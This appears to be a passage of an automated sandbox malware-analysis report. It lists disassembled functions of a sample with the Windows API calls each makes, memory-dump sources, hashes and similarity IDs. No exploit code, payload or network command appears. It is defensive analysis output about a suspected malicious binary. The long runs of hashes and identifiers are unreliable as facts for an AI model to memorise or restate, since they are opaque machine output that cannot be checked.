                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 36098e5712afd53b5e3c4de91d69c0015cf2cbbc5c01d2287a97767e02e0faf1
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e2a61d30099513a4b86aa9445ff639564bac9cad2a304c62a227ff9d1443cd16
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 05319376600108AFDB11CFA4CD85EEF73B9AF8C701F10419AFA0987250DB75AB85CBA4
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 00469BF3 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 88windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,0000018C,000000FF,00000000), ref: 00469C73
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetDlgCtrlID.USER32(00000000), ref: 00469C84
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetParent.USER32 ref: 00469C98
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,?,00000111), ref: 00469C9F
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetDlgCtrlID.USER32(00000000), ref: 00469CA5
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetParent.USER32 ref: 00469CBC
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,?,00000111,?), ref: 00469CC3
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: MessageSend$CtrlParent$_memmove_wcslen
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2360848162-1403004172
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: b77daa4920d68b7dc7b38413de7e2b04daab878370679d8231203fb1b5b646ea
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0121E7716001187BDB00AB69CC85ABF779CEB85320F00855BFA149B2D1D6B8D845C7A5
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 00469DF3 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 87windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000186,00000186,?,00000000), ref: 00469E71
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetDlgCtrlID.USER32(00000000), ref: 00469E82
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetParent.USER32 ref: 00469E96
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,?,00000111), ref: 00469E9D
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetDlgCtrlID.USER32(00000000), ref: 00469EA3
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetParent.USER32 ref: 00469EBA
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,?,00000111,?), ref: 00469EC1
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: MessageSend$CtrlParent$_memmove_wcslen
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2360848162-1403004172
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 986fe2d2ad3502a89dd9d9f189f0f45c93be64f12821e5ba271ad6af13960510
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 3a0c9dd1fa5fd4c1d1a647422213a645dfa1e4764d365342f395b6f430504e68
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 986fe2d2ad3502a89dd9d9f189f0f45c93be64f12821e5ba271ad6af13960510
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D121F7716001187BDB00ABA9CC85BBF77ACEB85310F00855FFA44EB2D5D6B8DC4587A5
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 0045DC4C Relevance: 15.2, APIs: 10, Instructions: 190COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: _wcscpy$FolderUninitialize$BrowseDesktopFromInitializeListMallocPath
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 262282135-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: f209a7e015878e5ef66622a864ec89938c936514b9877fb167e893f071c19078
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 25718275900208AFCB14EF95C9849DEB7B9EF88304F00899AE9099B312D735EE45CF64
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 00448123 Relevance: 15.2, APIs: 10, Instructions: 187windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 004481A8
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 004481AB
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 004481CF
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004481F2
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00448266
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001074,?,00000007), ref: 004482B4
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 004482CF
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000101D,00000001,00000000), ref: 004482F1
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000101E,00000001,?), ref: 00448308
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001008,?,00000007), ref: 00448320
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: MessageSend$LongWindow
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 312131281-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: c7c5d5d6f9bf0949bb943eac7ac5a8ec30049dd2ce11923e35461b50cec8bdb0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 97617C70A00208AFEB10DF94DC81FEE77B9FF49714F10429AF914AB291DBB5AA41CB54
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 00448D62 Relevance: 15.2, APIs: 10, Instructions: 174windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004413AA: DeleteObject.GDI32(?), ref: 0044140B
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(75C123D0,00001001,00000000,?), ref: 00448E16
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(75C123D0,00001026,00000000,?), ref: 00448E25
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00441432: CreateSolidBrush.GDI32(?), ref: 0044147E
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: MessageSend$BrushCreateDeleteObjectSolid
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3771399671-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 36703352345276820fdd923f04099b07a85a16fcace37fcd15d9f96d3dbdb764
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 7c26134f999fedcb31daf2d1c178305a5bad5d5d588b7e0560cc3c70a69cf84e
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 36703352345276820fdd923f04099b07a85a16fcace37fcd15d9f96d3dbdb764
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C7511570300214ABF720DF24DC85FAE77A9EF14724F10491EFA59AB291CB79E9498B18
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 00434621 Relevance: 15.1, APIs: 10, Instructions: 98threadCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 00434643
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetForegroundWindow.USER32(00000000), ref: 00434655
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetWindowThreadProcessId.USER32(00000000), ref: 0043465C
                                                                                                                                                                                                                                                                                                                                                                                                                                • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434671
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetWindowThreadProcessId.USER32(?,?), ref: 0043467F
                                                                                                                                                                                                                                                                                                                                                                                                                                • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434698
                                                                                                                                                                                                                                                                                                                                                                                                                                • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004346A6
                                                                                                                                                                                                                                                                                                                                                                                                                                • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 004346F3
                                                                                                                                                                                                                                                                                                                                                                                                                                • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434707
                                                                                                                                                                                                                                                                                                                                                                                                                                • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434712
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2156557900-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 33c2ceff45d8cb0672f592c0823183733d26e7ad7419b63083ab10cfbc882f35
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 98313EB2600204BFDB11DF69DC859AEB7A9FB9A310F00552AF905D7250E778AD40CB6C
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 0046943F Relevance: 14.3, APIs: 2, Strings: 6, Instructions: 287COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 0-1603158881
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 400245e8055df5988f0e80dfbae95eacb55e3b8a933f722a5dc1e2c8929bf265
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FAA162B5800204ABDF00EF61D8C1BEA3368AF54349F58857BEC096B146EB7D6909D77A
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 004485CB Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 109windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • CreateMenu.USER32 ref: 00448603
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetMenu.USER32(?,00000000), ref: 00448613
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448697
                                                                                                                                                                                                                                                                                                                                                                                                                                • IsMenu.USER32(?), ref: 004486AB
                                                                                                                                                                                                                                                                                                                                                                                                                                • CreatePopupMenu.USER32 ref: 004486B5
                                                                                                                                                                                                                                                                                                                                                                                                                                • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 004486EC
                                                                                                                                                                                                                                                                                                                                                                                                                                • DrawMenuBar.USER32 ref: 004486F5
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: 0
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 161812096-4108050209
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 1651b4fd0bf3e4e6d8e032b2651979207be8780685d2f09cc615cc8e1c1775d8
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9D418B75A01209AFEB40DF98D884ADEB7B4FF49314F10815EED189B340DB74A851CFA8
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 0047679F Relevance: 13.8, APIs: 9, Instructions: 307COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
